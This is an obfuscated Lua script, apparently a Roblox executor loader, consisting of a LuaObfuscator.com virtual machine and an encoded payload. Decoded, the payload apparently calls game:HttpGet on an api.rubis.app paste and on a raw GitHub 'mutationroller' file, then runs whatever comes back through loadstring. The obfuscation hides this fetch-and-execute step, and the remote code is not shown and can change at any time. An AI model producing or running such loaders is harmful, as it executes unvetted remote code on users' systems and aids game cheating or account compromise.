--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=v2(v0(v30,16));if v19 then local v106=0;local v107;while true do if (v106==1) then return v107;end if (v106==0) then v107=v5(v86,v19);v19=nil;v106=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/(2^(v32-(2 -1))))%((5 -(880 -(282 + 595)))^(((v33-((1638 -(1523 + 114)) -0)) -(v32-1)) + 1)) ;return v87-(v87%(2 -(1 + 0))) ;else local v88=(881 -262) -(555 + 64) ;local v89;while true do if (v88==(931 -(857 + 74))) then v89=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or ((1065 -(68 + 997)) + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (40022563 -23245347)) + (v39 * (14533 + 51003)) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1 -0 ,20) * ((352 -(87 + 263))^(212 -(67 + 113)))) + v41 ;local v45=v20(v42,(34 -18) + 5 ,(133 -58) -44 );local v46=((v20(v42,24 + 8 )==(3 -2)) and  -(953 -(802 + 150))) or (2 -1) ;if (v45==(0 -0)) then if (v44==0) then return v46 * (0 + 0) ;else v45=(174 + 824) -(915 + 82) ;v43=0 -0 ;end elseif (v45==2047) then return ((v44==(0 + 0 + 0)) and (v46 * ((1 -0)/(1187 -(1069 + 118))))) or (v46 * NaN) ;end return v8(v46,v45-(2320 -1297) ) * (v43 + (v44/(2^(843 -(368 + 423))))) ;end local function v25(v47) local v48=0 -0 ;local v49;local v50;while true do if (v48==(20 -(10 + 8))) then v50={};for v108=3 -2 , #v49 do v50[v108]=v2(v1(v3(v49,v108,v108)));end v48=(142 + 303) -(416 + 22 + 4) ;end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;v48=(773 -(201 + 571)) + 1 ;end if (v48==(4 -(1139 -(116 + 1022)))) then return v6(v50);end if (v48==(438 -(145 + 293))) then v49=nil;if  not v47 then v47=v23();if (v47==(430 -(44 + (1606 -1220)))) then return "";end end v48=1487 -(998 + 488) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 1194 -(352 + 842) ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90== #"\\") then if (v91== #",") then v92=(function() return v93()~=0 ;end)();elseif (v91==(3 -1)) then v92=(function() return v94();end)();elseif (v91~= #"91(") then else v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90~=0) then else local v115=(function() return 1821 -(1483 + 338) ;end)();local v116=(function() return;end)();while true do if (v115==(1695 -(1229 + 466))) then v116=(function() return 578 -(386 + 192) ;end)();while true do if (v116==(1206 -(696 + 510))) then v91=(function() return v93();end)();v92=(function() return nil;end)();v116=(function() return 1;end)();end if (v116==1) then v90=(function() return  #"<";end)();break;end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100) local v101=(function() return 0;end)();local v102=(function() return;end)();while true do if (v101==(0 -0)) then v102=(function() return 1262 -(1091 + 171) ;end)();while true do if (v102~=(0 + 0)) then else local v121=(function() return 0 -0 ;end)();while true do if (v121==0) then local v149=(function() return 0;end)();while true do if (v149==0) then v98[v99-#"~" ]=(function() return v100();end)();return v98,v99,v100;end end end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #"~",v57 do FlatIdent_104D4,Type,Cons,v21,v24,v25,v58,v66=(function() return v51(FlatIdent_104D4,Type,Cons,v21,v24,v25,v58,v66);end)();end v56[ #"19("]=(function() return v21();end)();for v67= #"~",v23() do local v68=(function() return 374 -(123 + 251) ;end)();local v69=(function() return;end)();while true do if ((0 -0)~=v68) then else v69=(function() return v21();end)();if (v20(v69, #",", #"|")==0) then local v117=(function() return 0;end)();local v118=(function() return;end)();local v119=(function() return;end)();local v120=(function() return;end)();while true do if (v117~=(698 -(208 + 490))) then else local v129=(function() return 0 + 0 ;end)();while true do if ((0 + 0)==v129) then v118=(function() return v20(v69,2, #"91(");end)();v119=(function() return v20(v69, #".com",6);end)();v129=(function() return 837 -(660 + 176) ;end)();end if (v129==(1 + 0)) then v117=(function() return 203 -(14 + 188) ;end)();break;end end end if (v117~=1) then else local v130=(function() return 0;end)();while true do if (1==v130) then v117=(function() return 2;end)();break;end if (v130==(675 -(534 + 141))) then v120=(function() return {v22(),v22(),nil,nil};end)();if (v118==(0 + 0)) then local v194=(function() return 0 + 0 ;end)();local v195=(function() return;end)();while true do if (v194~=0) then else v195=(function() return 0 -0 ;end)();while true do if (v195==0) then v120[ #"-19"]=(function() return v22();end)();v120[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v118== #"\\") then v120[ #"asd"]=(function() return v23();end)();elseif (v118==2) then v120[ #"xxx"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v118== #"asd") then local v204=(function() return 0 -0 ;end)();local v205=(function() return;end)();while true do if (0~=v204) then else v205=(function() return 0;end)();while true do if (v205~=0) then else v120[ #"-19"]=(function() return v23() -(2^16) ;end)();v120[ #".dev"]=(function() return v22();end)();break;end end break;end end end v130=(function() return 1 + 0 ;end)();end end end if (v117==3) then if (v20(v119, #"91(", #"xxx")== #"[") then v120[ #"0836"]=(function() return v58[v120[ #"?id="]];end)();end v53[v67]=(function() return v120;end)();break;end if (v117==2) then if (v20(v119, #".", #"~")== #"!") then v120[2]=(function() return v58[v120[2 + 0 ]];end)();end if (v20(v119,398 -(115 + 281) ,4 -2 )~= #">") then else v120[ #"-19"]=(function() return v58[v120[ #"asd"]];end)();end v117=(function() return 3;end)();end end end break;end end end for v70= #">",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + (0 -0) ];local v64=v60[2];local v65=v60[7 -4 ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=3 -2 ;local v76= -(868 -(550 + 317));local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v103=0 -0 ,v79 do if ((v103>=v73) or (3275==1804)) then v77[v103-v73 ]=v78[v103 + (2 -1) ];else v81[v103]=v78[v103 + (286 -(134 + 151)) ];end end local v82=(v79-v73) + (1666 -(970 + 695)) ;local v83;local v84;while true do v83=v71[v75];v84=v83[1 -0 ];if (v84<=(1995 -(582 + 1408))) then if (v84<=2) then if (v84<=(0 -0)) then v75=v83[3 -0 ];elseif ((v84>(3 -2)) or (1417>3629)) then v81[v83[2]]=v83[1827 -(1195 + 629) ];else do return;end end elseif (v84<=((3 + 0) -0)) then local v123=241 -(187 + 54) ;local v124;local v125;local v126;local v127;while true do if (v123==(780 -(162 + 618))) then v124=v83[2 + 0 ];v125,v126=v74(v81[v124](v13(v81,v124 + 1 + 0 ,v83[6 -3 ])));v123=1 -0 ;end if ((4795>402) and (v123==(1 + 0))) then v76=(v126 + v124) -1 ;v127=(2893 -(1043 + 214)) -(1373 + (994 -731)) ;v123=1002 -(451 + 549) ;end if (v123==(1 + (1213 -(323 + 889)))) then for v154=v124,v76 do v127=v127 + (1 -0) ;v81[v154]=v125[v127];end break;end end elseif ((4813>3565) and (v84==4)) then v81[v83[2 -0 ]]();else local v136=1384 -(746 + (1717 -1079)) ;local v137;local v138;local v139;local v140;local v141;while true do if (v136==(581 -(361 + 219))) then v75=v75 + 1 + 0 ;v83=v71[v75];v141=v83[2 -0 ];v140=v81[v83[344 -(218 + 123) ]];v81[v141 + (1582 -(1535 + 46)) ]=v140;v136=2 + 0 ;end if (v136==(1 + 5)) then v81[v83[562 -(306 + 254) ]]();v75=v75 + (321 -(53 + 267)) + 0 ;v83=v71[v75];v81[v83[2]]=v62[v83[5 -2 ]];v75=v75 + 1 + 0 ;v136=1474 -(899 + 568) ;end if ((3912==3912) and (v136==0)) then v137=nil;v138,v139=nil;v140=nil;v141=nil;v81[v83[(415 -(15 + 398)) + 0 ]]=v62[v83[985 -(18 + 964) ]];v136=2 -1 ;end if ((2821<=4824) and (v136==(611 -(268 + (1260 -925))))) then v140=v81[v83[3]];v81[v141 + ((169 + 122) -(60 + 230)) ]=v140;v81[v141]=v140[v83[576 -(426 + 146) ]];break;end if (v136==4) then v138,v139=v74(v81[v141](v13(v81,v141 + 1 + 0 ,v83[3])));v76=(v139 + v141) -(1457 -(282 + 1174)) ;v137=0;for v196=v141,v76 do local v197=811 -(569 + 242) ;while true do if (v197==0) then v137=v137 + 1 ;v81[v196]=v138[v137];break;end end end v75=v75 + (2 -1) ;v136=1 + 4 ;end if ((1738<=2195) and (v136==(1031 -(706 + 201 + 117)))) then v83=v71[v75];v81[v83[2]]=v62[v83[1254 -((1571 -(20 + 830)) + 530) ]];v75=v75 + 1 ;v83=v71[v75];v141=v83[1273 -(945 + 326) ];v136=19 -11 ;end if (v136==(5 + 0)) then v83=v71[v75];v141=v83[702 -(271 + 429) ];v81[v141]=v81[v141](v13(v81,v141 + 1 + 0 ,v76));v75=v75 + (1501 -(1408 + 92)) ;v83=v71[v75];v136=1092 -(461 + 625) ;end if ((41<=3018) and (v136==2)) then v81[v141]=v140[v83[1292 -(993 + 295) ]];v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[2]]=v83[1174 -(418 + 753) ];v75=v75 + 1 + 0 ;v136=1 + 2 ;end if (v136==3) then v83=v71[v75];v81[v83[1 + 1 ]]=v83[1 + 2 ]~=((413 + 116) -((532 -(116 + 10)) + 123)) ;v75=v75 + (1770 -(1749 + 20)) ;v83=v71[v75];v141=v83[2];v136=1 + 3 ;end end end elseif (v84<=(1330 -(1249 + 73))) then if (v84<=(3 + 3)) then v81[v83[1147 -(466 + 679) ]]=v83[3]~=(0 -0) ;elseif (v84==(19 -(1 + 11))) then local v142=1900 -(106 + 1794) ;local v143;while true do if (v142==((738 -(542 + 196)) + (0 -0))) then v143=v83[1 + 1 ];v81[v143]=v81[v143](v13(v81,v143 + 1 + 0 ,v76));break;end end elseif (v81[v83[2 + 0 ]]==v83[11 -7 ]) then v75=v75 + (2 -1) ;else v75=v83[117 -(4 + 110) ];end elseif (v84<=(593 -(57 + 527))) then for v132=v83[1429 -(15 + 26 + 1386) ],v83[106 -(17 + 86) ] do v81[v132]=nil;end elseif (v84>10) then local v144=0 + 0 ;local v145;local v146;while true do if ((2145<=4104) and (v144==(0 -0))) then v145=v83[5 -3 ];v146=v81[v83[169 -(122 + 44) ]];v144=1 -0 ;end if ((2689<4845) and (v144==(3 -2))) then v81[v145 + 1 ]=v146;v81[v145]=v146[v83[4 + 0 ]];break;end end else v81[v83[2]]=v62[v83[3]];end v75=v75 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F416E4D495061715462737943625A52342F72617703593Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D2Q6164562Q392F7363726970746D75746174696F6E2F726566732F68656164732F6D61696E2F6D75746174696F6E726F2Q6C6572001B3Q0012023Q00014Q0009000100013Q0026083Q00020001000100044Q00020001001202000100013Q002608000100050001000100044Q0005000100120A000200023Q001205000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001202000500064Q0003000300054Q000700023Q00022Q000400020001000100044Q001A000100044Q0005000100044Q001A000100044Q000200012Q00013Q00017Q00",v9(),...);
